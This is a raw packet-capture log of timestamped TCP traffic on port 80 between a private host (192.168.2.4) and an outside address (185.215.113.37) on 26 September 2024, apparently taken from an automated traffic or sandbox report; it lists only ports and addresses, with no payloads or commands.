Sep 26, 2024 18:27:14.796914101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.796926975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.796946049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.796960115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.796978951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797008991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797013998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797039986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797058105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797061920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797092915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797105074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797125101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797138929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797158003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797175884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797194004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797204971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797207117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797230959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797238111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797251940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797272921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797321081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797394037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797425032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797456980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797472000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797488928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797511101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797533035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797544003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797564983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797579050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797600985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.797610998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.797645092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.798309088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.798341036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.798368931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.798372984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.798396111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.798408985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.798441887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.798451900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.799452066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.799501896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.799513102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.799535990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.799546003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.799582005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.800420046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.800482988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.857331991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.857389927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.857402086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.857434988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.857444048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.857492924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.886250973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.886306047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.914186001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.914241076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.914273977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.914299965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.914341927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.920196056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.920274973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.920278072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.920283079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.920310974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.920331001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.920398951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.920450926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.920464039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.920499086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.920509100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.920532942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.920547962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.920566082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.920578003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.920614958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.920856953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.920891047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.920902014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.920933008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.920934916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.920965910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.920989990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.920989990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921047926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921061039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921094894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921107054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921142101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921154976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921188116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921205044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921233892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921236992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921267033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921282053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921298981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921319008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921333075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921341896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921376944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921462059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921490908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921510935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921521902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921531916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921555042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921569109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921586037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921603918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921618938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921641111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921653032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921664000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921705008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921735048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921767950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.921794891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921835899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.921914101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922033072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.922035933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922065973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922085047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.922112942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.922117949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922149897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922162056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.922183037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922194958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.922219038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922235966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.922271013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922276974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.922303915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922312021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.922352076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.922627926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922661066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922679901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.922694921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922709942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.922744036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.922806978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922840118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922857046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.922873974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.922883034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.922919035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923059940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923094988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923121929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923124075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923136950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923152924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923168898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923187971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923197985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923221111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923232079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923254013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923265934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923286915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923300028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923325062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923331022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923355103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923372984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923398018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923420906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923454046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923485041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923511028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923518896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923553944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923571110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923590899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923604012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923619032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923636913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923648119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923671007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923681974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923717022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923721075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923765898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923902988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923935890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.923949003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923979998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.923989058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924021959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924034119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924067020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924067020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924101114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924112082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924134016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924148083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924168110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924182892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924201012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924217939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924233913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924242973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924287081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924318075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924319983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924350023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924352884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924386024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924398899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924417019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924432039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924446106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924463987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924479961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924510956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924515963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924559116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924560070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924592018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924607992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924642086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924654007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924699068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924704075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924727917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924746990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924760103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924772024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924793959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924806118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924839020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924846888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924873114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.924890995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.924913883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.972897053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.972960949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.973001003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.973037004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.973078966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.045849085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.045911074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.046001911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.046008110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.046047926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.053370953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053423882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053432941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.053469896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.053478956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053512096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053544044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.053544998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053591013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053601027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.053625107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053657055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053658009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.053690910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053694010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.053726912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.053735971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053750038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.053772926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053801060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.053812981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053827047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.053847075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053860903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.053889990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053903103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.053922892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053941965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.053972960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.053976059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054007053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054038048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054053068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054069996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054101944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054107904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054138899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054152966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054167032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054198980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054213047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054230928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054245949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054264069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054279089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054296017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054323912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054328918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054347038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054359913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054374933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054395914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054426908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054459095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054490089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054514885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054522038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054553986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054580927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054585934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054589987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054619074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054625034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054649115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054666996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054667950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054681063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054712057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054723024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054744005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054754019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054766893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054781914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054799080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054816008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054827929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054848909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:15.054860115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:15.054882050 CEST	80	49730	185.215.113.37	192.168.2.4
